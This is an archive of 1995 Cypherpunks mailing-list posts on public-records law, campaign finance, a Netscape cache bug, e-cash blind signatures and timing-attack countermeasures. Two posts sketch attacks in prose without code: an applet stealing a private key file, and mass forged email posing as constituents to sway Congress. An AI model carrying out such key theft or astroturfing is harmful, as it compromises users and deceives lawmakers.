Each of the nearly two dozen sites that are reviewed in Buy It 
Online offers a strong selection of computer products for sale, and 
many also enable online purchasing (which is likely to become a firm 
requirement for this category in the near future). Some of the sites 
provide links to manufacturers' sites and other Internet resources 
of value to their customers. Others are just plain fun to visit for 
their contests, downloads, and freebies. A few are works in progress 
that show great potential.

What are the common characteristics that mark the better sites? For 
starters, secure credit-card transactions, up-to-date price lists, 
and catalog items that link to product information combining 
overview articles, feature lists, and tech specs. 

If you order computer products on the Web, please click the Feedback 
button tell the Trailblazer editors what your experience was like. 
Good or bad, Trailblazer wants to know about it.

For the latest word on the best computing sites, including more than 
300 (and growing) site-reviews under familiar computer headings, 
check out Trailblazer today at

 http://www.zdnet.com/~zdi/tblazer/


*     *     *     *     *     *     *     *     *     *

ZD Net Update is the official newsletter of ZD Net/World Wide Web 
Edition. It is compiled by Tom Schmidt (tom_schmidt@zd.com). Feel 
free to respond with news, notes, comments, or suggestions. To 
unsubscribe to ZD Net Update, point your browser to:

 http://www.zdnet.com/cgi-bin/ziffmail.pl/update

and select 

 "Unsubscribe to ZD Net Update."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jwarren@well.com (Jim Warren)
Date: Tue, 19 Dec 95 09:17:11 PST
To: holovacs@styx.ios.com
Subject: Re: Oklahoma University: Is this legal?...
Message-ID: <v02120d1dacfb9255dcd6@[153.36.101.40]>
MIME-Version: 1.0
Content-Type: text/plain


At 07:09 PM 12/17/95, sethf@MIT.EDU wrote:
>        c) someone decided that everything stored on the University's
>computer system was therefore a "public record" (since the computer is
>"owned" by the public), and thus had to be accessible by law.

Uh, every PRA (public records act) in the nation hase extensive exceptions
-- for school records, collective bargaining, various investigative
records, etc.

NO state PRA or federal FOIA declares blanket access to all public-agency
records -- often justifiably; sometimes for agency arse-covering.

--jim
Jim Warren, GovAccess list-owner/editor (jwarren@well.com)
Advocate & columnist, MicroTimes, Government Technology, BoardWatch, etc.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Tue, 19 Dec 95 06:32:17 PST
To: cypherpunks@toad.com
Subject: Re: (Fwd) SECURITY ALERT: Password protection bug in Netsca
Message-ID: <9512191432.AA28817@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Jeff writes:
> This report is mostly bogus.  Netscape does not, and never
> has stored http auth passwords in files on your disk.  However
> we do cache documents from servers that use http auth.
> In this case the user had their preferences set to check the
> host site for updated content "once per session".  There is
> a bug, which we are fixing before 2.0 ships, that if the
> auth fails the document should be removed from the cache but
> was not. If the user had set their cache checking to "never",
> then if the document is in the cache, it will always be shown to
> the user, since no connection is made to the server.
 
>   Content providers who don't want their web pages cached
> should use the 'Pragma: no-cache' http header.  This will
> tell the navigator to not save the document in the disk cache.
> 
> 	--Jeff

Thanks for clearing that up - I see you've already been over to 
www-security. The fast response Netscape (and in particular, 
you yourself) make to reported problems is something I'm very
pleased to see.

Peter Trei
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Kurt Buff (Volt Comp)" <a-kurtb@microsoft.com>
Date: Tue, 19 Dec 95 14:40:11 PST
To: "reh@wam.umd.edu>
Subject: RE: Political Cleanup program
Message-ID: <c=US%a=_%p=msft%l=RED-06-MSG951219111358NO00BA00@red-01-msg.itg.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


Ya won't have complete equity amongst lobbyists, until ya remove the power 
of bureaucrats to control people's lives. When laws can be used to deprive 
people of their livelihood, via either taxation or regulation, you will 
create situations where people can make money from it, and therefore 
unscrupulous people will take advantage. The only defensible argument for 
government at all is to protect people from depredation, either from fellow 
citizens or from external threats. When you prevent people from engaging in 
peaceful commerce, you open the floodgates to tyranny. Thus, the solution is 
less government, not to try to legislate human nature.

Kurt
[speaking for myself, of course]

----------
From: 	Richard Huddleston[SMTP:reh@wam.umd.edu]
Sent: 	Monday, December 18, 1995 6:12
To: 	jimbell@pacifier.com; vznuri@netcom.com
Cc: 	cypherpunks@toad.com
Subject: 	Re: Political Cleanup program

Detweiler wrote:
* >JB:
* >>Politics is traditionally corrupt, it appears, because donors to 
politicians
* >>and political campaigns expect a quid pro quo for their donations. 
 Various
* >>unsatisfactory solutions include campaign spending limits, etc.
* >
* >I have an unusual view that I've never seen elsewhere: the problem with
* >our government is not that money or PACs are involved, but that the 
system
* >does not handle or resolve the conflicts between them very well. in other
* >words, in contrary to the current view that all PACs are evil, I think 
the
* >problem is not that we have PACs, but that our current system does not
* >balance their demands in some sensible manner.  the system is
* >susceptible to corruption. it is conceivable however that there would be
* >a system that involves money and politics but still avoids corruption.

Not to sound like a dupe or anything, but every time I get discouraged
at the rampant mealyism of our political system I go read the first
couple of paragraphs of a text from GOVT 101.  There, I get reminded that
the way most political debate is handled elsewhere is with bullets.

Personally, I welcome a complete equity between all lobbyists seeking to
obtain a politico's ear.  Take the money out of the equation, and let the
merits of their causes, if any, stand on their own. 

Happy holidays,

Richard






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Kurt Buff (Volt Comp)" <a-kurtb@microsoft.com>
Date: Tue, 19 Dec 95 11:33:19 PST
To: Bill Stewart <hallam@w3.org>
Subject: RE: Political Cleanup program [NOISE]
Message-ID: <c=US%a=_%p=msft%l=RED-06-MSG951219113213QA00CB00@red-70-msg.itg.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain




----------
From: 	hallam@w3.org[SMTP:hallam@w3.org]
Sent: 	Tuesday, December 19, 1995 8:22
To: 	Bill Stewart; cypherpunks@toad.com
Cc: 	hallam@w3.org
Subject: 	Re: Political Cleanup program [NOISE]  


>I happen to believe in freedom of speech, especially political speech,
>and if you're not allowed to spend money broadcasting your speech or
>printing your messages, you don't have much freedom of press or speech.

It is very strange the way that "Libertarians" are so able to turn all
rights into property rights. Thus freedom of speech become freedom to have
influence on the politicial process in direct proportion to wealth.

Not so strange really. All rights, correctly understood, *are* property 
rights. What most don't understand is that rights are protections from the 
initiation of force by others. What this means is that you (anyone) don't 
have the right to the property of others. You have the right to offer 
mutually satisfactory exchanges, or even solicit outright gifts, but what is 
yours is yours, and it shouldn't be subject to extortion or theft by others. 
This includes your time, cash, and any other tangible assets you may own.

I began work on the web in '92 because I saw its potential as a political 
tool 
which did not have the bias of wealth. It has the potential to create a new 
kind 
of political dialogue. When the Web becomes as ubiquitous as the telephone 
we 
will still see inequalities of power, the homeless and the poor will still 
be 
underrepresented. But that situation must be judged against our own where 
the 
political process can be bought and traded as if it were any other form of 
comodity.

The problem with the political process now is that the government and its 
beneficiaries (which includes both the large corporation and the welfare 
class) have over time arrogated to themselves the power to steal (via taxes 
and regulation) our lives and our livelihood from us. The poor and the rich 
will always be with us, but they shouldn't be special clients of the state 
at the expense of everyone else.

It is not simply an issue of money, it is an issue of national security. If 
a 
foreigner were to control the majority of the media there would be a 
significant 
threat to the national interest. This threat has been realised in the UK 
with 
the comming to power of Rupert Murdoch. Fortunately his influence on the US 
political scene has thus far been minor. In his own country he has brought 
down 
the government more than once.

The only reason foreign money might be a threat to us is again that the 
government arrogated to itself the power to regulate our lives. The reason 
and interest for lobbying the government, whether through the press or 
through other, more direct, efforts is that the government *can do 
something* about whatever happens to be at issue. Take away the ability of 
the government to act, and there won't be any money spent lobbying it. I 
submit we'd all be better off.

>And as far as "prevent the political process from being owned by the rich" 
>goes, there have been brief exceptions over the last 5000 years in which
>the less-rich have overthrown the rich, but campaign finance laws have 
almost
>never kept the rich or the politicians from helping each other out.

In UK politicis the influence of an individual's money is limited to 
influencing 
one party. Even that is done behind closed doors. The other major parties 
both 
limit the size of individual contributions to a constituency party to a 
relatively nominal sum. $5000 is a huge sum in UK politics.

>I also don't believe freedom of speech should be limited by national 
>boundaries.

Nor do I. But I only vote in one country. If we take the question outside 
the US 
it would not on the whole be a good thing if the Prime Minister of Tobago 
(say) 
were provided with a campaign contribution of $1M by a foreign company with 
an 
interest in strip mining the entire island. similarly it would be a bad 
thing if 
Columbian drug lords were to make massive contributions to politicians 
committed 
to continuing the prohibition on drugs.

See my above comments. Only if the PM of Tobago could steal the land from 
its owners could he permit the island to be strip-mined. And only if the 
government has the power to prohibit drug possession would the Cali cartel 
be interested in making campaign contributions. No power to do something, no 
money offered to do it.

Kurt
[speaking only for myself, of course]


		Phill









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 19 Dec 95 08:36:15 PST
To: cypherpunks@toad.com
Subject: Antiterrorism Bill Dead
Message-ID: <2.2b10.32.19951219163342.006753a4@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At last some good news from the Hill.  The House Judiciary Committee has
announced that they are unable to vote on Chukie Schumer's Antiterrorism
bill at this time.  It is "dead for now."  That means that the $500 million
for the telecoms companies to carry out the Digital telphony Initiative is
also dead for now.

Thanks to an heroic coalition of leftist civil liberties types and right
wing nuts (including the Fundies) for squashing it for now.  

Now if we could only convince the Fundies that the Klinton Admin was going
to use the Exxon amendment to outlaw religious speech on the nets on the
grounds of political indecency.  But maybe the Telecoms bill will die too.
It did last time.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Tue, 19 Dec 95 09:38:34 PST
To: Jim_Miller@bilbo.suite.com
Subject: Re: Java and timing info - second attempt
Message-ID: <9512191737.AA00980@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


Jim Miller (jim_miller@bilbo.suite.com) writes:
>  Would it be possible to create a Java applet that causes the client
>  machine to sign or encrypt something with their private key, and
>  then send back timing info?

Since access to a private key should always be strictly mediated by the user  
any Java implementation would probably pop up a panel asking permission for  
every single private-key encryption operation requested by the applet.  The  
timing attacks require many timed encryptions to get enough information about  
the key.  Even if the user was completely clueless and had no idea what the  
applet was trying to do I would imagine that they would get tired of clicking  
"OK" long before sufficient key information was leaked .....

Of course it would be a lot easier for the applet to just try to read the  
secret key file, encrypt it with an embedded public key, and post it to  
alt.anonymous.messages.  Depending on how security was setup there might be  
only one or two panels that the user has to dismiss.  It would probably get  
past the same number of clueless users that a more complicated timing attack  
would fool.


andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Tue, 19 Dec 95 12:22:25 PST
To: Andrew Loewenstern <Jim_Miller@bilbo.suite.com
Subject: Re: Java and timing info - second attempt
Message-ID: <199512192018.MAA27098@netcom23.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>Jim Miller (jim_miller@bilbo.suite.com) writes:
>Of course it would be a lot easier for the applet to just try to read the  
>secret key file, encrypt it with an embedded public key, and post it to  
>alt.anonymous.messages.

If I understand Java security correctly, the applet can just send data back
to the server it was loaded from, but can't read random files on the
machine it runs on (even if the user running it can read them).  Java is
beginning to become cluefull about the idea that a program is not the same
as the person running it, and should not have the same privileges.  In this
area, most OSs (inluding Unix) are totally clueless, which is why the
Orange Book has mandatory security requirements at the "B" and above
levels.


-----------------------------------------------------------------
Bill Frantz                   Periwinkle  --  Computer Consulting
(408)356-8506                 16345 Englewood Ave.
frantz@netcom.com             Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@mbcl.rutgers.edu>
Date: Tue, 19 Dec 95 11:25:26 PST
To: hallam@w3.org
Subject: Re: Political Cleanup program [NOISE]
Message-ID: <01HYZTGSFLM48Y529F@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"hallam@w3.org" 19-DEC-1995 13:48:07.90

>It is very strange the way that "Libertarians" are so able to turn all
rights into property rights. Thus freedom of speech become freedom to have
influence on the politicial process in direct proportion to wealth.
------------------
	Funny, I'm disagreeing with you, and I believe that government ought to
be involved with making sure everyone has a chance to make political speech
(via subsidies of education). That doesn't mean that those who can make more
speech (through money or any other ability) should be handicapped.
------------------

>I began work on the web in '92 because I saw its potential as a political tool 
which did not have the bias of wealth. It has the potential to create a new
kind of political dialogue. When the Web becomes as ubiquitous as the
telephone we will still see inequalities of power, the homeless and the poor
will still be underrepresented. But that situation must be judged against our
own where the political process can be bought and traded as if it were any
other form of comodity.
------------------
	You're making the classic PC (otherwise known as distorted egalitarian)
mistake: you're wanting equality of results instead of equality of opportunity.
Freedom of speech and the press doesn't mean that everyone gets a free press
subsidized by the government, and no usage of means outside of that. It means
that everyone _potentially_ can influence the political process and the
marketplace of ideas.
------------------

>It is not simply an issue of money, it is an issue of national security. If a 
foreigner were to control the majority of the media there would be a
significant threat to the national interest. This threat has been realised in
the UK with the comming to power of Rupert Murdoch. Fortunately his influence
on the US political scene has thus far been minor. In his own country he has
brought down the government more than once.
-----------------
	This argument looks quite similar to those used for Canadian Content
restrictions. "We can't let in Hollywood, they might be more demanded by the
people than our own culture." "We can't let in Rupert Murdoch, his product
might be more demanded by the people than our own products." It all comes down
to people not having the courage to let their ideas be tested by what will get
the most demand.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David Klur" <dklur@dttus.com>
Date: Tue, 19 Dec 95 11:59:41 PST
To: cypherpunks@toad.com
Subject: E-cash coin questions (Mark Twain / Digicash)
Message-ID: <9511198194.AA819410227@cc2.dttus.com>
MIME-Version: 1.0
Content-Type: text/plain


     
     
     1.  How many different coins (serial numbers) can the current Mark 
     Twain/Digicash protocol support?
     
     2. Does Mark Twain bank maintain 2 lists: 1 of all the ecash serial 
     numbers for all coins ever produced, and 1 of all the ecash serial 
     numbers for all coins that have been spent before?  Or just 1 list of 
     the spent coins (assuming that any coin that is signed w/MT's private 
     key and does not appear on the "spent" list is still valid and is not 
     counterfeit)?
     
     3.  The Digicash scheme allows each coin to be used only once and then 
     destroyed.  How many coins will it take before all possible coins are 
     minted, used and destroyed thereby requiring banks to issue new coins 
     with "recycled" serial numbers?  Remember, each time a "transaction" 
     takes place, an existing coin is destroyed and a new coin is minted. 
     and a transaction can simply be Alice giving her friend Bob a dollar 
     (not necessarily using the ecash for a purchase)
     
     
     4.  What is the probability of guessing a valid serial number, 
     assuming there are 1 million, 1 billion or 1 trillion coins in 
     circulation?
     
     5.  Suppose you have a very large number of 
cash coins signed by the 
     same bank (say, Mark Twain) and you know the record layout of each 
     coin (easy enough since you can decrypt it with the bank's public 
     key), and for each coin the "bank name" field is the same (because 
     it's the same bank!) -- then, would it be possible to hack the RSA 
     encryption and recreate the bank's private key?
     
     
     -----BEGIN PBP SIGNATURE-----
     Version: 1.0.0, Copyright 1995, Pretty Bad Privacy
     
     David Klur   
     dklur@dttus.com
     
     I am who I am because I say so.  So there. 
     -----END PBP SIGNATURE-------
     





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@research.att.com>
Date: Tue, 19 Dec 95 12:02:14 PST
To: cypherpunks@toad.com
Subject: revised time quantization package (Unix & WIN32) available
Message-ID: <199512192009.PAA17051@nsa.tempo.att.com>
MIME-Version: 1.0
Content-Type: text/plain


A revised version of my simple CPU time quantization package is
now available for most Unix and, thanks to the efforts of Frank
O'Dwyer (Rainbow Diamond Ltd), WIN32 platforms.  The package provides
a simple interface to encapsulate code blocks that must run in a
multiple of a coarse-grained "quantized" amount of CPU time.  It
is useful in building various on-line cryptographic protocols in
which an attacker could otherwise learn key information by observing
the time the target takes to perform calculations that use the
secret (c.f., Paul Kocher's recent attacks).

The basic idea is that you can specify a "quantum" such that at
the end of an encapsulated block the CPU will busy-wait until the
next quantum multiple.  Fine-grained (below the quantum) timing
information is thereby denied to the observer (including unprivileged
processes on the same machine).  The code is quick-and-dirty and
only runs on Unix-centric and WIN32-based platforms.  Test and use
at your own risk.

There are (basically) no restrictions on the use or distribution
of the (very simple) code.

Get it from:
	ftp://research.att.com/dist/mab/quantize.shar

The quantize package is also part of Jack Lacy's cryptolib package
(watch this space for details).

-matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: SINCLAIR  DOUGLAS N <sinclai@ecf.toronto.edu>
Date: Tue, 19 Dec 95 12:30:49 PST
To: cypherpunks@toad.com
Subject: DES modem
Message-ID: <95Dec19.153022edt.1588@cannon.ecf.toronto.edu>
MIME-Version: 1.0
Content-Type: text/plain


I recently aquired a DES modem.  It's a MESA432 made by Western Datacom.
The writing on the front proclaims "9600 bps NBS DES ENCRYPTION MODEM".
It has all of the usual front lights, plus one labled 'encrypt'.  On
the back it has jacks for leased-line and dial-up, an RS232 connector
and an external speaker connector.

Has anyone ever used one of these?  Can anyone give me any information on it?
I realize that without a second modem it's not much use.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Kurt Buff (Volt Comp)" <a-kurtb@microsoft.com>
Date: Tue, 19 Dec 95 16:00:09 PST
To: Bill Stewart <hallam@w3.org>
Subject: RE: Political Cleanup program [NOISE]
Message-ID: <c=US%a=_%p=msft%l=RED-06-MSG951219153443UD006800@red-01-msg.itg.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


Let's try this again, shall we? My mailer didn't act the way I wanted it 
to...
___________________________________
>I happen to believe in freedom of speech, especially political speech,
>and if you're not allowed to spend money broadcasting your speech or
>printing your messages, you don't have much freedom of press or speech.

It is very strange the way that "Libertarians" are so able to turn all
rights into property rights. Thus freedom of speech become freedom to have
influence on the politicial process in direct proportion to wealth.
_____________________________________
Not so strange really. All rights, correctly understood, *are* property 
rights. What most don't understand is that rights are protections from the 
initiation of force by others. What this means is that you (anyone) don't 
have the right to the property of others. You have the right to offer 
mutually satisfactory exchanges, or even solicit outright gifts, but what is 
yours is yours, and it shouldn't be subject to extortion or theft by others. 
This includes your time, cash, and any other tangible assets you may own.
_______________________________________________
I began work on the web in '92 because I saw its potential as a political 
tool 
which did not have the bias of wealth. It has the potential to create a new 
kind 
of political dialogue. When the Web becomes as ubiquitous as the telephone 
we 
will still see inequalities of power, the homeless and the poor will still 
be 
underrepresented. But that situation must be judged against our own where 
the 
political process can be bought and traded as if it were any other form of 
comodity.
________________________________________
The problem with the political process now is that the government and its 
beneficiaries (which includes both the large corporation and the welfare 
class) have over time arrogated to themselves the power to steal (via taxes 
and regulation) our lives and our livelihood from us. The poor and the rich 
will always be with us, but they shouldn't be special clients of the state 
at the expense of everyone else.
_____________________________________
It is not simply an issue of money, it is an issue of national security. If 
a 
foreigner were to control the majority of the media there would be a 
significant 
threat to the national interest. This threat has been realised in the UK 
with 
the comming to power of Rupert Murdoch. Fortunately his influence on the US 
political scene has thus far been minor. In his own country he has brought 
down 
the government more than once.
_____________________________________________
The only reason foreign money might be a threat to us is again that the 
government arrogated to itself the power to regulate our lives. The reason 
and interest for lobbying the government, whether through the press or 
through other, more direct, efforts is that the government *can do 
something* about whatever happens to be at issue. Take away the ability of 
the government to act, and there won't be any money spent lobbying it. I 
submit we'd all be better off.
________________________________________________
>And as far as "prevent the political process from being owned by the rich" 
>goes, there have been brief exceptions over the last 5000 years in which
>the less-rich have overthrown the rich, but campaign finance laws have 
almost
>never kept the rich or the politicians from helping each other out.

In UK politicis the influence of an individual's money is limited to 
influencing 
one party. Even that is done behind closed doors. The other major parties 
both 
limit the size of individual contributions to a constituency party to a 
relatively nominal sum. $5000 is a huge sum in UK politics.

>I also don't believe freedom of speech should be limited by national 
>boundaries.

Nor do I. But I only vote in one country. If we take the question outside 
the US 
it would not on the whole be a good thing if the Prime Minister of Tobago 
(say) 
were provided with a campaign contribution of $1M by a foreign company with 
an 
interest in strip mining the entire island. similarly it would be a bad 
thing if 
Columbian drug lords were to make massive contributions to politicians 
committed 
to continuing the prohibition on drugs.
_______________________________________
See my above comments. Only if the PM of Tobago could steal the land from 
its owners could he permit the island to be strip-mined. And only if the 
government has the power to prohibit drug possession would the Cali cartel 
be interested in making campaign contributions. No power to do something, no 
money offered to do it.
____________________
		Phill


Kurt
[Speaking only for myself, of course]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Tue, 19 Dec 95 12:58:49 PST
To: cypherpunks@toad.com
Subject: Re: Antiterrorism Bill Dead
In-Reply-To: <2.2b10.32.19951219163342.006753a4@panix.com>
Message-ID: <9512192058.AA14733@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>Now if we could only convince the Fundies that the Klinton Admin was going
>to use the Exxon amendment to outlaw religious speech on the nets on the
>grounds of political indecency.  But maybe the Telecoms bill will die too.
>It did last time.

Last I heard it was headed for a veto. Way too much pork for Republican 
contributors to get anywhere.


		Phill



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Tue, 19 Dec 95 13:05:48 PST
To: cypherpunks@toad.com
Subject: Forged email to sway congress
Message-ID: <9512192101.AA13974@all.net>
MIME-Version: 1.0
Content-Type: text


It seems like a trivial thing to do, but if email to Congress works to
sway opinion, it should be fairly easy to create thousands of email
messages from different apparent sources each hour, all supporting a
point of view, and to suppliment this effort with a small telephone room
full of people to fill congressional switchboards with supportive phone
calls.  Interesting PM attack.

-> See: Info-Sec Heaven at URL http://all.net/
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vinod Valloppillil" <vvallopp@eniac.seas.upenn.edu>
Date: Tue, 19 Dec 95 13:19:07 PST
To: cypherpunks@toad.com
Subject: cyphernomicon FTP site?
Message-ID: <199512192118.QAA02590@red.seas.upenn.edu>
MIME-Version: 1.0
Content-Type: text/plain


Anyone know where I can FTP a full copy of the cyphernomicon?

------------------------------+-----------------------------------------------
Vinod Valloppillil            | LibertarianismTelecommunicationsFreeMarketEnvi 
Engineering/Wharton           | ronmentalismTechnologyCryptographyElectronicCa
University of Pennsylvania    | shInteractiveTelevisionEconomicsPhilosophyDigi
vvallopp@eniac.seas.upenn.edu | talPrivacyAnarchoCapitalismRuggedIndividualism
------------------------------+-----------------------------------------------



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill.Humphries@msn.fullfeed.com (Bill Humphries)
Date: Tue, 19 Dec 95 15:14:37 PST
To: The Cypherpunk Mailing List <cypherpunks@toad.com>
Subject: Applescripts for monitoring Netscape Activity
Message-ID: <v01530500acfcf5689227@[199.184.183.25]>
MIME-Version: 1.0
Content-Type: text/plain


The recent Netscape beta bug mentioned here raised a technical question?

Anyone here have a pointer to an applescript, frontier or macperl script
for monitoring what programs do to your system folder and desktop?
Otherwise, I'd better write one.

It'd be a good way to learn more about the behavior of apps.

Thanks and happy holidays,

Bill Humphries

        Call your Representative and Senators and demand an end to
     attempts to censor the Internet. More info at http://www.vtw.org/
    *** The answer to porn speech is free speech -- via Molly Ivins ***






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Tue, 19 Dec 95 17:30:30 PST
To: ecash@digicash.com
Subject: Re:  E-cash coin questions (Mark Twain / Digicash)
Message-ID: <199512200128.RAA09801@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


From: "David Klur" <dklur@dttus.com>
>      
>      1.  How many different coins (serial numbers) can the current Mark 
>      Twain/Digicash protocol support?

I don't know this offhand, but I assume it is at least 2^64.

>      2. Does Mark Twain bank maintain 2 lists: 1 of all the ecash serial 
>      numbers for all coins ever produced, and 1 of all the ecash serial 
>      numbers for all coins that have been spent before?  Or just 1 list of 
>      the spent coins (assuming that any coin that is signed w/MT's private 
>      key and does not appear on the "spent" list is still valid and is not 
>      counterfeit)?

It is not possible for the bank to have a list of the serial numbers on
coins produced, since it doesn't know this information.  Each coin is
created by a user's client software, which chooses the serial number at
random.  When it is sent to the bank to be signed, the serial number is
blinded by being multiplied by a random number, which is divided off
after the client gets it back from the bank.  So the bank never sees a
coin's serial number until it is deposited.

>      3.  The Digicash scheme allows each coin to be used only once and then 
>      destroyed.  How many coins will it take before all possible coins are 
>      minted, used and destroyed thereby requiring banks to issue new coins 
>      with "recycled" serial numbers?  Remember, each time a "transaction" 
>      takes place, an existing coin is destroyed and a new coin is minted. 
>      and a transaction can simply be Alice giving her friend Bob a dollar 
>      (not necessarily using the ecash for a purchase)

It is easy to make this number so large that it will take longer than the
age of the universe for this to happen.  It just takes a dozen or so
bytes per coin.

>      4.  What is the probability of guessing a valid serial number, 
>      assuming there are 1 million, 1 billion or 1 trillion coins in 
>      circulation?

Assuming the serial numbers are of the sizes I suggest above, this
chance is so close to zero that your chances of being named King of the
Earth next year (along with the assumption that we switch to a World
Government and it is a monarchy) are much greater.

>      5.  Suppose you have a very large number of ecash coins signed by the 
>      same bank (say, Mark Twain) and you know the record layout of each 
>      coin (easy enough since you can decrypt it with the bank's public 
>      key), and for each coin the "bank name" field is the same (because 
>      it's the same bank!) -- then, would it be possible to hack the RSA 
>      encryption and recreate the bank's private key?

I don't fully understand what you are getting at, but there are several
false assumptions here.  The "coin" has several parts, one of which is an
RSA signed portion with a number in it, for which I am accepting your
terminology of it being a "serial number".  This terminology is not quite
right, as the coins are not numbered serially (that is, sequentially, 1,
2, 3, etc.), rather the numbers are random.  But it does capture the
essential idea that each coin's number is unique.

You do know the record layout of each coin, but that is because it is
documented and because your client creates coins, not because you could
decrypt it with the bank's public key.  The coin does not have the bank
name field within the RSA signed part.  There is other information
which goes along with the coin, including an identifier for the bank,
outside the RSA signed portion.

For the general question of whether inspection of a lot of RSA-signed
coins would allow you to deduce the private key, the answer is no, as
far as is known.  Actually the attack you can mount is stronger than
this; you can get the bank to RSA sign any number.  You could ask it to
sign "1", for example, and you will get "1" back (so that's not very
useful).  I have tried to think of a way of getting some useful
information from getting it to sign "2", since that is such a simple
number.  But it is raised to a very large power, and as far as I can
see what you will get back is just a random looking number, with all
hints about the exponent gone.

Again, as far as anyone knows, there is no way to break RSA using these
kinds of attacks, at least not any more cheaply than factoring the modulus.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Tue, 19 Dec 95 15:48:35 PST
To: cypherpunks@toad.com
Subject: Re: Forged email to sway congress
In-Reply-To: <9512192101.AA13974@all.net>
Message-ID: <9512192345.AA15356@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



It already happens with other media. The Christian Coalition have an army of 
letter writters at their call. They simply write a very large number of letters 
and post them. It is not difficult if you can afford it.

Political staffers know all about this type of thing and can recognise spam. 

It would be usefull to have some mechanism for producing a one time use ID on 
the Web however. This would be configured such that each party can vote once but 
once only. There is stuff in the open meeting system that does this using an 
email callback loop (later used by First Virtual).

	Phill



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 19 Dec 95 15:50:10 PST
To: cpunk@remail.ecafe.org (ECafe Anonymous Remailer)
Subject: Re: revised time quantization package (Unix & WIN32) available
In-Reply-To: <199512192232.WAA18554@pangaea.ang.ecafe.org>
Message-ID: <199512192349.SAA25296@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



ECafe Anonymous Remailer writes:
[Lots of garbage slandering Matt Blaze, who's about as close to being
a dyed-in-the-DNA cypherpunk as you can get.]

What I want to know is, why are you doing this? Are you trying to
start a flame war? Are you just an asshole? Are you Detweiler? Whats
the motive?

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@crypto.com>
Date: Tue, 19 Dec 95 16:03:46 PST
To: cypherpunks@toad.com
Subject: Re: revised time quantization package (Unix & WIN32) available
In-Reply-To: <199512192232.WAA18554@pangaea.ang.ecafe.org>
Message-ID: <199512200009.TAA17192@crypto.com>
MIME-Version: 1.0
Content-Type: text/plain


I don't normally like to respond to anonymous kooks, but...

cpunk@remail.ecafe.org (ECafe Anonymous Remailer) writes:
> AT&T Spokesman Matt Blaze writes:
> blah blah
> >There are (basically) no restrictions on the use or distribution
> >of the (very simple) code.
> 
> This is simply untrue. Read the fine print in the file. Use this code
> and you owe them big. They'll "reach out and touch" you big time.
> If they were serious, they'd gpl it.
> 

Since I don't understand what you're talking about, I can't really
respond to it.  The only restrictions on the use of this code are that
you have to acknowledge where it came from and that it comes with no
waranty.  You also have to keep the notice in place on any copies you give
to anyone else.  Just like the GPL, only without the nutty requirement
that you also give away your own source code.

> >Get it from:
> >	ftp://research.att.com/dist/mab/quantize.shar
> >
> >The quantize package is also part of Jack Lacy's cryptolib package
> >(watch this space for details).
> 
> I don't understand why this group continues to tolerate these blatently
> commercial messages from att (and netscape.) (The message is
> really just an ad for the cryptolib product, as it says). I've also said
> this b4 but I'll say it again: why would anyone in their right mind trust
> binary code from att after the clipper fiasco.

I think you're confused.  AT&T Bell Labs Research (which is soon to be
split into two parts, Bell Labs and AT&T Labs, owned by two different
companies starting next year) is a research laboratory.  A lot of very
good cryptology and security people work here.  While AT&T (the
parent company) is in the products and services business, AT&T Bell Labs
doesn't sell any products or services itself.  Like most of the
computer science researchers in Bell labs (and like those in universities
and elsewhere), I publish the results of most the work that I do (modulo
some consulting I do for the moneymaking part of the company in order
to "pay the rent").  I (like many other researchers) also sometimes create
software in the course of my work.  When this might be of use to others,
I prefer to give it away rather than let it sit idle on my disk.  The
quantization code (like CFS, swIPe and others) is an example.  CryptoLib
is another example; it was created by my colleague Jack Lacy.  We give that
away, too.  Bell Labs doesn't advertise anything.  We don't have retail 
customers.  Our research software is unconnected with AT&T's commercial
activities.  We make it available because that's what members of the research 
community do.  Its distribution is neither purely altruistic nor especially
mercenary.  If you really like our research software, I guess you can switch
your long distance service to AT&T or buy an AT&T answering machine or
something.  But that part of the company is very remote from my food chain.
